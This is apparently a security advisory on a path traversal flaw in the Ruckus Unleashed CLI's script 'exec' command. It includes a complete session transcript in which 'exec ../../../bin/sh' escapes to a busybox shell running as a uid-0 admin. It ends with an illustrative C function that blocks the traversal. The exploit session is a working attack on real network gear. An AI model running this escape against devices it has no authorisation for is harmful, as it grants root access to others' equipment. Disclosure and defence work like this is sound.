This is a command injection vulnerability via a crafted CLI command.
/bin/ruckus_cli2 is a CLI used by Ruckus for user interaction and by their web interface to run commands. ruckus_cli2 has a script menu that can run a limited set of stored scripts. The exec command in that menu is vulnerable to path traversal, and can be used to run /bin/sh in order to escape to a busybox shell.
Information about the exploitation of the vulnerability can be found in our blog post or the 36C3 talk.
Jailbreaking the Ruckus CLI using this exploit:
Please login: admin
Password:
Welcome to Ruckus Unleashed Network Command Line Interface
ruckus> enable
ruckus# debug
You have all rights in this mode.
ruckus(debug)# script
ruckus(script)# exec ../../../bin/sh
Ruckus Wireless ZoneDirector -- Command Line Interface
Enter 'help' for a list of built-in commands.
ruckus$ echo $USER
admin
ruckus$ grep $USER /etc/passwd
admin:$1$-----------:0:0:root:/:/bin/sh
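
The missing check, as an added example (not Ruckus code and not the vendor's fix): the argument given to exec is resolved lexically under the scripts directory and refused if it is absolute or climbs above that directory, which is what ../../../bin/sh does. The function name resolve_script, the MAX_DEPTH limit and the /scripts directory are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_DEPTH 16

/* Lexically resolve `name` under `base`. Returns 0 and fills `out` only if the
 * result stays inside `base`; returns -1 for absolute paths, for ".." that
 * climbs above `base`, for names that resolve to `base` itself, and for
 * overlong input. Symlinks are not followed, so `base` must not be writable. */
int resolve_script(const char *base, const char *name, char *out, size_t outlen)
{
    char buf[256], *parts[MAX_DEPTH];
    int depth = 0;

    if (!name || !name[0] || name[0] == '/' || strlen(name) >= sizeof(buf))
        return -1;
    strcpy(buf, name);

    for (char *tok = strtok(buf, "/"); tok; tok = strtok(NULL, "/")) {
        if (strcmp(tok, ".") == 0)
            continue;
        if (strcmp(tok, "..") == 0) {
            if (depth == 0)
                return -1;              /* would leave the scripts directory */
            depth--;
            continue;
        }
        if (depth == MAX_DEPTH)
            return -1;
        parts[depth++] = tok;
    }
    if (depth == 0)
        return -1;                      /* nothing left to execute */

    size_t used = (size_t)snprintf(out, outlen, "%s", base);
    for (int i = 0; i < depth; i++) {
        if (used >= outlen) return -1;  /* output buffer too small */
        used += (size_t)snprintf(out + used, outlen - used, "/%s", parts[i]);
    }
    return used < outlen ? 0 : -1;
}

int main(void)
{
    char path[512];
    /* "/scripts" is a hypothetical directory; the inputs are constructed. */
    const char *inputs[] = { "diag.sh", "sub/../diag.sh", "../../../bin/sh" };
    for (int i = 0; i < 3; i++)
        printf("%-16s -> %s\n", inputs[i],
               resolve_script("/scripts", inputs[i], path, sizeof(path)) == 0 ? path : "rejected");
    return 0;
}
```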